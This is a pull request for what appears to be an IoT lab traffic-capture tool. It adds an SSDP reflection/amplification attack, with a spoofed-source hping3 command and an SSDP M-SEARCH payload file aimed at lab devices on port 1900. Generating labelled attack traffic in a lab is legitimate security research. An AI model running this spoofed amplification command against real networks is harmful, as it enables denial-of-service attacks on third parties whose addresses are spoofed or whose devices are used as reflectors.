### PR TITLE
feat: SSDP reflection/amplification attack

### DIFF
--- a/configs/attacks.yaml
+++ b/configs/attacks.yaml
@@ -57,6 +57,30 @@ attacks:
     repeats: 3
     duration_seconds: 60
 
+  # Reflection/Amplification DDoS (#81)
+  # 192.168.1.250 is a decoy spoofed-victim IP, not a real device on this
+  # lab network - it is not present in devices.yaml. DNS/NTP reflection are
+  # deliberately not included here: the lab devices are consumer IoT
+  # hardware (hubs/cams/plugs) that expose UPnP/SSDP, not open DNS
+  # resolvers or NTP servers, so spoofed DNS/NTP queries at them wouldn't
+  # elicit any real amplified response - just non-functional traffic.
+  - name: ssdp_reflection
+    label: SSDP_Reflection
+    enabled: true
+    repeats: 3
+    command:
+      - hping3
+      - --spoof
+      - 192.168.1.250
+      - --udp
+      - -c
+      - "5"
+      - -p
+      - "1900"
+      - -E
+      - configs/payloads/ssdp_msearch.txt
+      - "{target_ip}"
+
   # - name: http_request
   #   label: HTTP_Request
   #   enabled: false

--- a/configs/payloads/ssdp_msearch.txt
+++ b/configs/payloads/ssdp_msearch.txt
@@ -1,0 +1,6 @@
+M-SEARCH * HTTP/1.1
+HOST: 239.255.255.250:1900
+MAN: "ssdp:discover"
+MX: 2
+ST: ssdp:all
+


### PR DESCRIPTION
Part of the attack-library expansion roadmap in #66. Resolves #81.

## Summary
- New `ssdp_reflection` entry in `attacks.yaml` (`kind: command`, no new code) — real `hping3 --spoof` with a real SSDP M-SEARCH payload (`configs/payloads/ssdp_msearch.txt`, real CRLF line endings, loaded via hping3's `-E`) sent to a device on port 1900, with a decoy spoofed-victim source IP (`192.168.1.250`, not a real device in `devices.yaml`).
- This is the actual Mirai/Gafgyt DDoS-for-hire signature — spoofed-source amplification — distinct from the direct floods already in the set.

## Scope note: DNS/NTP intentionally deferred
#81 was titled "SSDP/DNS/NTP" but I scoped this PR to SSDP only. This lab's devices (`configs/devices.yaml`) are consumer IoT hardware — hubs, cameras, smart plugs, a vacuum, a doorbell — that commonly expose UPnP/SSDP but don't run open DNS resolvers or NTP servers. Sending spoofed DNS/NTP queries at them wouldn't elicit any real amplified response, which would just be non-functional/fake traffic — against the authenticity requirement from #66. Happy to revisit if there's a real open resolver/NTP service somewhere in the lab I'm not aware of.

MITRE: T1498.002 Reflection Amplification.

## Test plan
- [x] `uv run pytest` — full suite green (88 tests, unchanged — no new Python code)
- [x] `uv run ruff format . && uv run ruff check .` — clean
- [x] `uv run capex --dry-run` — confirms `configs/attacks.yaml` loads/validates with the new entry
- [x] `xxd` verified the payload file has real CRLF bytes, not escaped text

I'll merge this manually; will close #81 with a comment linking the merge afterward.